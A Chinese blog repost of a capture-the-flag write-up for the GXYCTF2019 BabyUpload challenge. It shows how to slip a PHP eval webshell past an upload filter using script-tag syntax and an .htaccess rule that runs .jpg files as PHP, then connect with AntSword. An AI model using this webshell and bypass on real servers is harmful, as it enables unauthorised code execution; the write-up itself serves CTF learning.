首页 > 其他分享 >[GXYCTF2019]BabyUpload 1

[GXYCTF2019]BabyUpload 1

时间:2024-09-16 10:34:43浏览次数:1  
标签:后缀 BabyUpload flag 过滤 ph 上传 GXYCTF2019

打开靶机,上传文件抓包

后缀不能带ph,大小写也无法绕过,意味着phtml后缀也无法上传

对后缀只过滤ph,我们转变思路上传图片马,用.htaccess使图片马以php格式打开

上传图片马


上传失败,试一试过滤了哪些字符

文件内容过滤了<?

我们尝试另一种写法后成功上传<script language="php">eval($_POST['cmd']);</script>

再上传.htaccess AddType application/x-httpd-php .jpg

上传成功

查找flag过程中发现system函数被禁用,我们使用蚁剑连接

查询flag flag{dbcf4ba5-bbb0-410a-aa50-76871ab58350}

标签:后缀,BabyUpload,flag,过滤,ph,上传,GXYCTF2019
From: https://www.cnblogs.com/m1saka1/p/18416062

相关文章

  • [GXYCTF2019]禁止套娃
    这题用御剑扫描不出来什么结果,最后看大佬的wp发现这题使用githack扫出来的首先来收一下git源码泄露的原因:开发人员在开发的时候,常常会先把源码提交到远程托管网站(如github),最后在从远程托管网站把源码pull到服务器的web目录下,如果忘记把.git文件删除,就会造成此漏洞。利用.git......
  • BUUCTF [GXYCTF2019]simple CPP
    buu上的一道z3题,记录一下z3奇怪的用法。首先扔进ida,打开主函数,非常混乱的算法,大概发现两个关键点:这里应该是对flag进行异或得到v6而这里的比较应该就是求解flag的关键,可以看出来有四个未知数,求解也是非常简单,z3直接求解即可:fromz3import*x,y,z,w=BitVecs("xyz......
  • [GXYCTF2019]BabySQli
    [GXYCTF2019]BabySQli非常神奇的一道题,漏洞利用点在于联合查询时如果数据不存在,则会创建一个临时虚拟用户于是当前尝试username=admin,返回wrongpass则该用户名存在所以username:1'unionselect1,'admin','202cb962ac59075b964b07152d234b70'#(202cb962ac59075b964b07152......
  • [GXYCTF2019]Ping Ping Ping
    [GXYCTF2019]PingPingPing(命令执行绕过总结)题目来源收录于:BUUCTFGXYCTF2019题目描述提示较为明确,get方法传参127.0.0.1后结果如下比较容易想到联合执行命令,先看有哪些文件尝试直接读取flag.php读取失败,对空格进行了过滤。题解以下内容参考文章:https://blog......
  • CTF练习日记——[GXYCTF2019]Ping Ping Ping 1
    首先尝试一下分号有没有被过滤:?ip=127.0.0.1;ls;可以看见分号没有被过滤,看到了flag.php和index.php两个文件,先尝试能不能打开flag.php:?ip=127.0.0.1;catflag.php;能看出空格被过滤了,我们用$IFS$1绕过空格:?ip=127.0.0.1;cat$IFS$1flag.php;可以看见flag也被过滤了,我们打开i......
  • CTF笔记——[GXYCTF2019]禁止套娃 1
    [GXYCTF2019]禁止套娃1打开题目之后什么都没看到所以进行常规的检测漏洞,扫描目录发现存在.git文件夹下的文件存在#DirsearchstartedSunMar1015:19:392024as:D:\Python\Scripts\dirsearch-uhttp://849b4a98-3df3-4abb-927e-1a358a178e30.node5.buuoj.cn:81/-x429......
  • 文件上传例题:[GXYCTF2019]BabyUpload
    文件上传例题:[GXYCTF2019]BabyUpload打开网址明显文件上传上传简单php马尝试后缀名过滤,使用BP抓包进行修改提示文件类型不对,修改成image/jpeg提示还是php,那换成js马<scriptlanguage="php">eval($_POST['cmd']);</script>上传成功解析php代码需要.htaccess文件在文......
  • [GXYCTF2019]禁止套娃
    [GXYCTF2019]禁止套娃打开环境没有发现什么提示,使用dirsearch扫描目录,发现git泄露。通过githack下载源码<?phpinclude"flag.php";echo"flag在哪里呢?<br>";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\......
  • [GXYCTF2019]BabySQli
    [GXYCTF2019]BabySQli打开是一个登录页面任意输入账号密码提示wronguser输入admin提示wrongpass,说明有admin的账号并且在页面源代码中发现一串经过编码后的字符串经过base32和base64解码后得到SQL语句使用万能密码进行尝试,得到donothackme!的结果根据源码提示,我......
  • [GXYCTF2019]BabyUpload
    [GXYCTF2019]BabyUpload打开靶场看到个上传文件的选项,应该是上传文件漏洞上传个一句话木马文件尝试<?phpeval($_POST['cmd']);?>提示不能带有php的后缀改成jpg后缀,提示“上传类型也太露骨了吧!”修改了Content-Type为image/jpeg还是不行换了一种一句话木马GIF89a<sc......